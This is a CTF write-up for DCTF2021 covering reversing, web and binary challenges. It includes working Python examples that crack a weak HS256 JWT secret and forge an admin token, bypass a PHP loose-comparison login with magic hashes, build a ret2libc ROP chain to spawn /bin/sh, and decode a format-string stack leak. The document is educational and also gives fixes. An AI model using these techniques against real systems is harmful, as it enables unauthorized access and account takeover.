I recently participated in DCTF2021, which was a beginner-to-intermediate jeopardy-style CTF hosted by DragonSI in Slovenia.

I was able to complete a few pwn, rev, and web challenges and have provided writeups here: https://github.com/snix0/dctf-writeups

Rev

Bell

This was a simple reverse engineering problem, made simpler thanks to Binary Ninja's excellent High Level IL (HLIL) view. In a loop, the program compared each piece of the user input against the output of a function named triangle.

I transcribed the triangle function into a simple Python script and used it to produce the inputs that the program needed in order to output the contents of the flag.

Web

Simple Web

This was a website where you could click a button to request the flag. Intercepting the request with Burp, we see that a parameter named "auth" is sent along with the other parameters. Simply setting "auth" to 1 grants access to the flag: the server trusted a client-supplied authorization flag instead of checking a server-side session.

Secure API

This was a backend API that required JWT authentication. We enumerated the login endpoint, which issued a valid JWT for the "guest" account with easily guessable credentials. The token was signed with a symmetric HMAC algorithm and a weak secret (JWTs are signed, not encrypted, so anyone holding the secret can mint tokens), so we brute-forced the secret offline, changed the username claim from guest to admin, re-signed the token, and sent the tampered token in place of the original. This granted access to the flag.
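The attack above, reconstructed as an added example (not the challenge's code or the writeup's own script): a minimal HS256 JWT implementation on top of the standard library, an offline dictionary attack that re-signs header.payload with each candidate secret, and a forge step that rewrites the username claim. The secret, the claim name "username", and the wordlist are constructed for the demo and are assumptions.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    """Base64url without padding, as JWS (RFC 7515) requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    # Re-add the padding the token stripped before decoding.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def hs256_sign(header: dict, payload: dict, secret: bytes) -> str:
    """Build a signed HS256 token from header and payload dicts."""
    signing_input = (
        b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def verify_hs256(token: str, secret: bytes) -> bool:
    """True if the token's signature matches HMAC-SHA256(secret, header.payload)."""
    signing_input, _, sig_b64 = token.rpartition(".")
    expected = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def crack_hs256_secret(token: str, wordlist):
    """Offline dictionary attack: no requests to the server are needed, because
    the token itself is the oracle. Returns the matching secret or None."""
    for cand in wordlist:
        if verify_hs256(token, cand.encode()):
            return cand
    return None


def token_username(token: str) -> str:
    """Read the (assumed) 'username' claim from the payload segment."""
    payload_b64 = token.split(".")[1]
    return json.loads(b64url_decode(payload_b64))["username"]


def forge_admin_token(token: str, secret: str) -> str:
    """Keep the original header, set username=admin, re-sign with the cracked secret."""
    header_b64, payload_b64, _ = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    payload["username"] = "admin"
    return hs256_sign(header, payload, secret.encode())


# Constructed demo data (assumptions): a guest token as the login endpoint might
# have returned it, signed with a weak secret that appears in a small wordlist.
WEAK_SECRET = "secret123"
GUEST_TOKEN = hs256_sign({"alg": "HS256", "typ": "JWT"}, {"username": "guest"}, WEAK_SECRET.encode())
WORDLIST = ["password", "admin", "jwt", "secret123", "letmein"]

if __name__ == "__main__":
    found = crack_hs256_secret(GUEST_TOKEN, WORDLIST)
    print("cracked secret:", found)
    print("forged token  :", forge_admin_token(GUEST_TOKEN, found))
```

The defence is on the issuing side: a long random secret (or an asymmetric algorithm such as RS256/ES256 with the private key kept off the API host), and a verifier that pins the expected algorithm rather than trusting the token's alg header.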

Very Secure Website

A known weakness of the loose comparison operator used in the login form (the "magic hash" issue in PHP's ==) was leveraged to bypass the password check. Hashes of the form 0e followed only by digits are interpreted as the number zero, so two different hashes of that form compare equal; supplying a password whose hash has that form passed the check. The username hash was an unsalted hash of a common value and was easily found with an online lookup.
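An added example (not the challenge's code) that emulates the loose comparison in Python so the bypass can be checked offline. It assumes the form hashed the password with MD5 and compared with PHP's ==, which the writeup does not state; the two magic inputs are the well-known QNKCDZO / 240610708 pair, whose MD5 digests both start with 0e and continue with digits only.

```python
import hashlib
import hmac
import re

# PHP-style numeric string: optional sign, digits/decimal, optional exponent.
NUMERIC = re.compile(r"^\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?$")


def php_loose_eq(a: str, b: str) -> bool:
    """Emulate PHP's == on two strings: if both parse as numbers they are compared
    numerically, so '0e123' == '0e456' because both are 0 * 10^n. This still holds
    in PHP 8, which only changed comparisons between numbers and non-numeric strings."""
    if NUMERIC.match(a) and NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def is_magic(hexhash: str) -> bool:
    """A 'magic' hash is one PHP reads as zero: a leading 0e followed only by digits."""
    return re.fullmatch(r"0e\d+", hexhash) is not None


def vulnerable_check(password: str, stored_hash: str) -> bool:
    # The bug: loose comparison. Any password whose MD5 is 0e<digits> passes
    # against any stored hash of the same shape, without knowing the real password.
    return php_loose_eq(md5_hex(password), stored_hash)


def fixed_check(password: str, stored_hash: str) -> bool:
    # The fix: strict, constant-time byte comparison (PHP: hash_equals, or ===).
    # For real password storage, a salted slow hash (password_hash) is the right tool.
    return hmac.compare_digest(md5_hex(password), stored_hash)


def find_magic_input(candidates) -> str:
    """Scan a list of strings for one whose MD5 is magic; the well-known ones were
    found by brute force over short alphanumeric strings in exactly this way."""
    for c in candidates:
        if is_magic(md5_hex(c)):
            return c
    return None


# Constructed demo (assumption): the stored hash is md5('QNKCDZO'), which is magic.
STORED_HASH = md5_hex("QNKCDZO")
MAGIC_INPUT = "240610708"  # a different string whose MD5 is also of the form 0e<digits>

if __name__ == "__main__":
    print("stored:", STORED_HASH, "magic?", is_magic(STORED_HASH))
    print("bypass with", MAGIC_INPUT, "->", vulnerable_check(MAGIC_INPUT, STORED_HASH))
    print("after fix              ->", fixed_check(MAGIC_INPUT, STORED_HASH))
```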

Pwn

Pwn Sanity Check

A ret2win problem, which I solved with a ret2libc approach instead: I leaked the address of puts and used a simple ROP chain to execute /bin/sh.
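The ret2libc arithmetic from the solve above, as an added example that is not the writeup's exploit script: stage one overflows the buffer to call puts on the GOT entry of puts and return to main; stage two turns the leaked address into a libc base and chains pop rdi; ret, the "/bin/sh" string, and system. Every offset and gadget address below is a constructed placeholder (the real binary's values are not on the page), and the leak parsing assumes an x86-64 target where puts stops at the first NUL byte of the pointer.

```python
import struct

# Constructed/assumed values: replace with the real binary's and libc's offsets.
BUF_OFFSET = 72          # bytes from buffer start to the saved return address
PUTS_OFFSET = 0x80ED0    # offset of puts inside libc
SYSTEM_OFFSET = 0x52290  # offset of system inside libc
BINSH_OFFSET = 0x1B45BD  # offset of the "/bin/sh" string inside libc
POP_RDI_RET = 0x4011C3   # pop rdi; ret gadget in the binary
RET_GADGET = 0x40101A    # a lone ret, used to fix 16-byte stack alignment


def p64(v: int) -> bytes:
    return struct.pack("<Q", v)


def parse_leak(raw: bytes) -> int:
    """puts prints the GOT entry up to its first NUL. A canonical x86-64 user pointer
    (0x00007f...) arrives as 6 bytes plus the newline puts appends, so zero-extend
    it to 8 bytes before unpacking. A pointer whose low byte is 0x00 would print
    as an empty line and needs a different leak primitive."""
    data = raw.split(b"\n", 1)[0]
    if not 1 <= len(data) <= 8:
        raise ValueError("unexpected leak length %d" % len(data))
    return struct.unpack("<Q", data.ljust(8, b"\x00"))[0]


def base_is_sane(base: int) -> bool:
    """libc is mapped page-aligned; a misaligned base means the wrong symbol offset."""
    return base > 0 and (base & 0xFFF) == 0


def libc_base(leaked_puts: int, puts_offset: int = PUTS_OFFSET) -> int:
    base = leaked_puts - puts_offset
    if not base_is_sane(base):
        raise ValueError("libc base not page-aligned: wrong puts offset or bad leak")
    return base


def stage1_leak(puts_plt: int, puts_got: int, main_addr: int) -> bytes:
    """Overflow -> pop rdi; ret -> puts@GOT -> puts@PLT -> main (second overflow)."""
    return (b"A" * BUF_OFFSET + p64(POP_RDI_RET) + p64(puts_got)
            + p64(puts_plt) + p64(main_addr))


def stage2_shell(base: int) -> bytes:
    """Overflow -> ret (realign stack) -> pop rdi; ret -> "/bin/sh" -> system.
    The extra ret matters: system's movaps instructions fault if rsp is not
    16-byte aligned at the call, a common reason a correct chain 'does nothing'."""
    return (b"A" * BUF_OFFSET + p64(RET_GADGET) + p64(POP_RDI_RET)
            + p64(base + BINSH_OFFSET) + p64(base + SYSTEM_OFFSET))


if __name__ == "__main__":
    # Simulated run (constructed): pretend the target printed this leak.
    fake_base = 0x7F1234567000
    fake_output = p64(fake_base + PUTS_OFFSET)[:6] + b"\n"
    leaked = parse_leak(fake_output)
    print("leaked puts: %#x -> libc base %#x" % (leaked, libc_base(leaked)))
    print("stage2 length:", len(stage2_shell(libc_base(leaked))))
```

In a live solve the two payloads are sent over the process or socket in sequence (e.g. with pwntools), and the leak is read between them; offsets come from the target's libc (pwntools' ELF or a libc database), not from guesses.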

Pinch Me

A simple buffer overflow, used to overwrite a stack variable that the program compared against a fixed value to decide whether or not to print the flag.

Readme

Exploited a format string vulnerability: used pointer-printing specifiers to read values off the stack, one slot at a time, until the contents of the flag were leaked.
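The part of a format-string leak that is easy to get wrong is turning the printed words back into bytes, so here is an added example (not the writeup's script) that builds the %N$p payload, decodes the leaked words as little-endian machine words, and searches the result for the flag. The flag prefix dctf{, the slot numbers and the sample leak are constructed assumptions; the (nil) handling reflects how glibc prints a NULL pointer.

```python
import struct


def build_leak_format(first_slot: int, count: int) -> str:
    """Direct parameter access (%6$p) reads a chosen argument slot regardless of how
    many specifiers precede it. On x86-64 the first five %p values come from the
    argument registers (rsi, rdx, rcx, r8, r9), so stack words start at slot 6."""
    return ".".join("%%%d$p" % i for i in range(first_slot, first_slot + count))


def decode_stack_words(leaked_tokens, word_size: int = 8) -> bytes:
    """Rebuild raw stack bytes from what %p printed, lowest slot first. Each slot
    is one little-endian word, so a string on the stack comes out reversed per
    word if you just read the hex; packing it fixes the byte order."""
    fmt = "<Q" if word_size == 8 else "<I"
    out = bytearray()
    for tok in leaked_tokens:
        if tok == "(nil)":                  # glibc prints NULL pointers this way
            out += b"\x00" * word_size
        else:
            out += struct.pack(fmt, int(tok, 16))
    return bytes(out)


def extract_flag(raw: bytes, prefix: bytes = b"dctf{") -> str:
    """Find prefix...} in the decoded bytes; None if it is not (fully) present."""
    start = raw.find(prefix)
    if start < 0:
        return None
    end = raw.find(b"}", start)
    if end < 0:
        return None                         # leak more slots: flag is cut off
    return raw[start:end + 1].decode()


def encode_stack_words(data: bytes, word_size: int = 8):
    """Constructed helper for the demo: what %p would print for a buffer holding
    `data` on the stack (the inverse of decode_stack_words)."""
    fmt = "<Q" if word_size == 8 else "<I"
    padded = data.ljust(-(-len(data) // word_size) * word_size, b"\x00")
    words = [struct.unpack(fmt, padded[i:i + word_size])[0]
             for i in range(0, len(padded), word_size)]
    return ["(nil)" if w == 0 else hex(w) for w in words]


if __name__ == "__main__":
    # Constructed leak: a few unrelated stack words, then the flag buffer.
    flag = b"dctf{constructed_flag_for_demo}"
    sample = ["0x7ffd6b9c2a40", "(nil)", "0x1"] + encode_stack_words(flag)
    print("payload:", build_leak_format(6, len(sample)))
    print("flag   :", extract_flag(decode_stack_words(sample)))
```

A practical note: send the specifiers in batches (the program's input buffer and the output length are both limited), and if the flag is cut off at the end of a batch, continue from the next slot rather than re-leaking from slot 6.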